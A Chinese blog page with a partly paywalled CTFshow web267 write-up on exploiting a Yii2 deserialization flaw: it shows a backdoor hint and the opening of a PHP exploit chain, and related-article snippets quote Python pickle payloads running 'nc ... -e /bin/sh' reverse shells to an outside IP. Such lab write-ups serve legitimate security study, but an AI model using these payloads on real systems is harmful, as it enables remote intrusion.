CTFshow 反序列化 web267

最新推荐文章于 2026-03-30 10:43:31 发布
原创 最新推荐文章于 2026-03-30 10:43:31 发布 · 1.5k 阅读 · 0
标签
#安全
本文详细记录了解决CTFshow中web267反序列化问题的过程。通过尝试登录并分析源代码,作者在about页面找到线索,使用%2F进行路径遍历。了解到网站使用Yli框架2.0版本,进一步搜索该框架的漏洞信息,找到了针对Yii2 2.0.38之前版本的exploit,最终成功触发phpinfo页面。

目录

思路

进去是一个网页,在login页面试了下密码,发现是admin:admin,成功登录,但发现没什么改变

一个个页面查看源代码,最后再about页面中发现提示

在这里插入图片描述
访问?r=site%2Fabout&view-source拿到提示

///backdoor/shell
unserialize(base64_decode($_GET['code']))

刚开始不知道怎么去用,后面想到%2F就是/,尝试了下r=/backdoor/shell,提示要加上参数,然后思路又断了,应该是信息收集的不够

在这里插入图片描述
用Wappalyzer插件发现用的是Yli框架,又再源码中得知他用的是2.0版本,网上搜下有没有相关漏洞

在这里插入图片描述
在这里插入图片描述
参考博客:https://blog.csdn.net/xuandao_ahfengren/article/details/111259943中给出的exp,适用于Yii2 2.0.38 之前的版本

<?php
namespace yii\rest{
   
   
    class CreateAction{
   
   
        public $checkAccess;
        public $id;
 
        public function __construct(){
   
   
            $this->checkAccess = 'phpinfo'
最低0.47元/天 解锁文章
[CTFSHOW web267]Yii2 反序列化漏洞(CVE-2020-15148)
Landasika的博客
05-17 1945
目录 [CTFSHOW web267]Yii2 反序列化漏洞(CVE-2020-15148)一、什么是YiiYii 是什么YiiYii 最适合做什么?二、漏洞分析三、漏洞pocyii 2.0.37 以前yii 2.0.37 以后四、WEB_267 [CTFSHOW web267]Yii2 反序列化漏洞(CVE-2020-15148) 一、什么是Yii 参考官网 https://ww...
[ctfshow]web入门——反序列化web261+web264-web267
ShenZ的博客
03-02 6830
[ctfshow]web入门——反序列化 反序列化 unserialization [ctfshow]web入门——反序列化 web261 web264 str_replace字符串覆盖逃逸 web265 web266 web267 yii系列 反序列化 unserialization[ctfshow]web入门——反序列化
ctfshow-web入门-反序列化web265-web270)
Welcome To My6n Blog
11-09 1421
_destruct() 在对象被销毁时会自动调用,我们只需要让 ctfshow 类正确被反序列化即可,但是直接传 ctfshow 会被检测,之后就会抛出异常,如果程序报错或者抛出异常就不会触发 __destruct() 了,因为 throw 那个函数回收了自动销毁的类,导致 __destruct() 检测不到有东西销毁,从而也就无法触发 __destruct()。拿到 flag:ctfshow{f5b30e4e-16e1-4fb2-ad07-c75c6c069453}admin/admin 可以登录。
ctfshow web入门 php反序列化 web267--web270
2301_81040377的博客
05-10 760
查看源代码发现这三个页面。然后发现登录页面直接。
ctf-show,web入门,反序列化254~267
2301_80548709的博客
03-23 1400
而%user变量后接了一个反序列化的函数,我们只需要写一个脚本,将创建类的将本序列化,传给cookie,同时注意到,源程序种没有将isVip更改的函数,所以序列化时这里也要注意,最后将其转码为url编码即可使用。
ctf_show笔记篇(web入门---反序列化
whale_waves的博客
03-19 2661
例如$a = 1 $b = 2, 这时让$b = &$a, 再给$a 重新赋个值 $a = 3, 这个时候$b就会一直跟着$a变化, $a是什么$b就是什么。利用php处理畸形的序列化的处理措施, 当php收到畸形的序列化时, 会因为对此序列化的不放心, 会第一时间处理掉它, 所以能直接让处理他的顺序排在了最前面。这时, 如果传入一个|O:5:"Class"类似于这样的序列化, php就会自动把|前面的当作键名用, 反而会反序列化|后的值。
反序列化3(ctfshow web263-web267
m0_72929232的博客
02-01 940
session.serialize_handler 是用来设置 session 序列化引擎的,在 5.5.4 前默认是 php,5.5.4后默认是 php_serialize,在 PHP 反序列化存储的 $_SESSION 数据时如果使用的引擎和序列化时使用的引擎不一样,就会导致数据无法正确第反序列化,也就是 session 反序列化漏洞。message.php页面要求设置Cookie:msg的值,没有要求,随便输入即可。用dirsearch扫一下,发现www.zip文件,访问下载下来是网站源码。
ctfshow-web入门-反序列化(前篇)
ccfly1012的博客
10-24 6364
目录 web254 web255 web256 web257 web258 web259 web260 web261 web262 web263 web264 web265 web266 web267 web254 <?php ​ /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified t..
CTFshow-Web入门-反序列化漏洞实战解析(Web265-Web270)
最新发布
weixin_28454475的博客
03-30 374
本文深入解析CTFshow-Web入门系列中的反序列化漏洞实战(Web265-Web270),涵盖PHP反序列化基础、变量引用绕过、魔术方法利用及Yii框架漏洞等核心技巧。通过详细案例演示如何构造恶意payload,并分享防御方案与CTF实战建议,帮助安全研究人员掌握反序列化漏洞的攻防要点。
CTFshow 反序列化wp
会下雪的晴天
01-02 1916
title: CTFshow 反序列化wp date: 2020-12-02 20:03:53 categories: ctfshow link:https://yq1ng.github.io/ 说一些有的没的: payload(有效攻击负载)是包含在你用于一次漏洞利用(exploit)中的ShellCode中的主要功能代码 shellcode(可提权代码) 对于一个漏洞来说,ShellCode就是一个用于某个漏洞的二进制代码框架,有了这个框架你可以在这个ShellCode中包含你需要的Payload.
ctfshow 反序列化(254-278)
fainpo的博客
06-07 1820
用 |O:4:"User":3:{s:8:"username";可以看到fuck成功替换成了loveU,s:4这里表示的是4个字符,但是由于我们替换了,变成了5个字符,他就只会看love,这个U就不会看了。一般有这种str_replace将4个字符,替换成5个字符,或者任意的,只要字符替换的个数不相等,都是字符串逃逸的应用场景。将会以我们构造的token为admin为准,后面的token为user的值他就会丢弃,因为我们已经闭合了。
CTFSHOWweb入门反序列化
7ruth0hn的博客
07-25 3911
web254 include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this->isVip; } public function login($u,$p){ if($this
CTFshow 反序列化
starttv的博客
12-09 991
​Session​一般称为“会话控制“,简单来说就是是一种客户与网站/服务器更为安全的对话方式。一旦开启了session​ 会话,便可以在网站的任何页面使用或保持这个会话,从而让访问者与网站之间建立了一种“对话”机制。不同语言的会话机制可能有所不同,这里仅讨论​机制。​​可以看做是一个特殊的变量,且该变量是用于存储关于用户会话的信息,或者更改用户会话的设置,需要注意的是,​ 变量存储单一用户的信息,并且对于应用程序中的所有页面都是可用的,且其对应的具体session​ 值会存储于服务器端,这也是与。
CTFSHOW 反序列化 267 Yii2反序列化
m0_63017297的博客
04-18 187
发现之后反回一个错误页面,并没有回显。利用ls查看当前目录下并没有flag文件,将结果重定向到2.txt。这里不知道flag文件位置,就利用cp将flag文件拷贝至1.txt,查看结果。看到反序列化传参,但是没有源码,这里直接查看框架发现是yii。接着用phpggc生成exp,一开始尝试用cat进行读取。login进行登录,admin/admin。
WebCTFSHOW 常用姿势刷题记录(全)
uuzeray的博客
02-25 4228
通过将常用的函数、类和数据打包成.so 文件,不同的程序可以共享这些代码,避免重复编写和维护相同的代码逻辑,提高了代码的重用性。
ctfshow 反序列化篇(下)
m0_62422842的博客
08-05 1153
ctfshow反序列化web267-web268的题目
ctfshow-web入门-反序列化web271-web278)
Welcome To My6n Blog
11-11 1527
laravel 反序列化漏洞。public$admin=false; admin 默认是 false ,我们需要修改它为 true 才会进入 system。但是这里无法直接修改,我们可以采用 phar 文件来触发,当读取 phar 文件时,会自动反序列化 manifest 中的字符串,采用 phar 协议来读取即可。
CTFshow 反序列化 web277
Kradress的博客
02-12 738
目录源码题解总结 源码 查看源代码 提示pickle,得知考点是pickle反序列化 题解 exp 试了几次不能用bash,最后用了/bin/sh,因为环境里面没有装bash,得不到响应nc连上就会自动断开 import base64 import pickle class shell(object): def __reduce__(self): return (eval, ("__import__('os').system('nc 119.91.26.229 9999
ctf.show反序列化(web254-web278)
热门推荐
wanan的博客
08-31 1万+
ctf.show反序列化(web254-web278)
CTFshow 反序列化 web278
Kradress的博客
02-12 314
目录思路题解总结 思路 题目提示了过滤了os.system,那么我们把system改成popen().read() 题解 import base64 import pickle class shell(object): def __reduce__(self): return (eval, ("__import__('os').popen('nc 119.91.26.229 9999 -e /bin/sh').read()",)) k = shell() print(bas
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值